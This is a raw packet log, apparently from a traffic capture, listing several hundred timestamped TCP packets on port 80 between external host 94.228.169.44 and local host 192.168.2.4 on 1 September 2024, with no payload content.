Sep 1, 2024 18:27:46.761912107 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.761923075 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.761960030 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.762293100 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.762304068 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.762314081 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.762324095 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.762331963 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.762367010 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.762584925 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.762595892 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.762605906 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.762619019 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.762648106 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.762716055 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.762727976 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.762742996 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.762753963 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.762779951 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.762799025 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.763123989 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.763181925 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.763194084 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.763216019 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.763447046 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.763489008 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.763514996 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.763616085 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.763627052 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.763637066 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.763653040 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.763676882 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.765623093 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.765656948 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.765670061 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.765691996 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.765835047 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.765877008 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.765960932 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.765979052 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.765990019 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.766000032 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.766015053 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.766038895 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.775883913 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.775895119 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.775922060 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.775949955 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.776072979 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.776110888 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.776170015 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.776180983 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.776190996 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.776201010 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.776216030 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.776232004 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.776424885 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.776433945 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.776475906 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.776571035 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.776581049 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.776601076 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.776612043 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.776622057 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.776623011 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.776634932 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.776645899 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.776669025 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.777117968 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.777128935 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.777178049 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.777251005 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.777268887 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.777308941 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.777487993 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.777498007 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.777508020 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.777532101 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.788321972 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.788366079 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.788392067 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.788403034 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.788439989 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.788522959 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.788532972 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.788543940 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.788569927 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.788759947 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.788798094 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.789535046 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.789572954 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.789607048 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.789608955 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.789750099 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.789761066 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.789771080 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.789784908 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.789799929 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.790030956 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.790043116 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.790052891 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.790062904 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.790086031 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.790105104 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.790405035 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.790416002 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.790426016 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.790437937 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.790457964 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.790488958 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.790744066 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.809638023 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.809676886 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.809686899 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.809710979 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.809736967 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.809802055 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.809818983 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.809830904 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.809843063 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.809858084 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.809871912 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.810025930 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.829514980 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.829554081 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.829566002 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.829592943 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.829616070 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.829715014 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.829725981 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.829735041 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.829783916 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.829966068 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.829977989 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.829988003 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.830002069 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.830022097 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.830090046 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.830101013 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.830111980 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.830146074 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.830291986 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.830302000 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.830338001 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.836570024 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.836585999 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.836599112 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.836615086 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.836623907 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.836626053 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.836637974 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.836648941 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.836649895 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.836659908 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.836682081 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.855439901 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.855454922 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.855465889 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.855504036 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.855526924 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.855551958 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.855564117 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.855573893 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.855597019 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.855912924 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.855950117 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.855967999 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.856040955 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.856055021 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.856065035 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.856081963 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.856112957 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.856251001 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.856261969 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.856271029 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.856290102 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.857712984 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.857875109 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.857937098 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.857948065 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.857980967 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.858055115 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.858164072 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.858175039 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.858186007 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.858200073 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.858203888 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.858222961 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.858499050 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.858510017 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.858520031 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.858531952 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.858535051 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.858544111 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.858553886 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.858582020 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.859299898 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.859309912 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.859334946 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.859344006 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.859353065 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.859363079 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.859368086 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.859383106 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.859406948 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.859746933 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.859757900 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.859767914 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.859778881 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.859801054 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.859828949 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.860984087 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.860996008 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.861006021 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.861043930 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.861349106 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.861358881 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.861370087 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.861381054 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.861382961 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.861404896 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.870090961 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.870121956 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.870132923 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.870176077 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.870213985 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.870496988 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.870507956 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.870517969 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.870528936 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.870546103 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.870549917 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.870570898 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.871031046 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.871042967 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.871052980 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.871064901 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.871076107 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.871077061 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.871093988 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.871099949 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.871105909 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.871115923 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.871119976 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.871126890 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.871139050 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.871149063 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.871165037 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.872442007 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.872452974 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.872467995 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.872489929 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.872518063 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.880917072 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.880930901 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.880940914 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.880979061 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.881046057 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.881057978 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.881067038 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.881078005 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.881089926 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.881092072 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.881114006 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.881133080 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.881284952 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.881294966 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.881304026 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.881320000 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.881331921 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.881331921 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.881344080 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.881356001 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.881361961 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.881366968 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.881377935 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.881377935 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.881388903 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.881402016 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.881428957 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.883707047 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.883719921 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.883728981 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.883759975 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.898389101 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.898401022 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.898411036 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.898448944 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.898458958 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.898469925 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.898474932 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.898525000 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.898704052 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.898715019 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.898724079 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.898746014 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.898756027 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.918962002 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.919246912 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.919272900 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.919284105 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.919295073 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.919305086 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.919317007 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.919423103 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.919601917 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.919612885 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.919622898 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.919636011 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.919646025 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.919651985 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.919656992 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.919667006 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.919667006 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.919687986 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.919702053 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.925170898 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.925188065 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.925218105 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.925228119 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.925316095 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.925363064 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.925373077 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.925388098 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.925422907 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.925645113 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.925656080 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.925692081 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.944010973 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.944262981 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.944288969 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.944299936 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.944315910 CEST	80	56160	94.228.169.44	192.168.2.4
